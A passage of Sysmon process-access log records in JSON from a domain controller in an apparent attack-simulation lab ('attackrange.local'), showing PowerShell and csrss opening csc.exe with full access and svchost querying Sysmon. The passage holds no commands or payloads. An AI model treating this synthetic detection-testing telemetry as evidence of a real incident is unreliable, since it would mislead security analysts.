:"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4794,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:56.724\r\nSourceProcessGUID: {E2A3D6B1-11BF-5F25-0000-0010A17E0600}\r\nSourceProcessId: 1576\r\nSourceThreadId: 5064\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11C0-5F25-0000-0010B2910600}\r\nTargetProcessId: 2312\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1ecb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1999|UNKNOWN(00007FFF447EA43F)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:56.724","SourceProcessGUID":"{E2A3D6B1-11BF-5F25-0000-0010A17E0600}","SourceProcessId":"1576","SourceThreadId":"5064","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11C0-5F25-0000-0010B2910600}","TargetProcessId":"2312","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1ecb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1999|UNKNOWN(00007FFF447EA43F)","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4795,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:56.724\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:56.724","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4796,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:56.724\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:56.724","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4797,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:56.724\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:56.724","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4798,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:56.724\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:56.724","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4799,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:56.724\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11C0-5F25-0000-0010B2910600}\r\nTargetProcessId: 2312\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:56.724","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11C0-5F25-0000-0010B2910600}","TargetProcessId":"2312","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4800,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:56.724\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:56.724","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4801,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:56.724\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:56.724","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
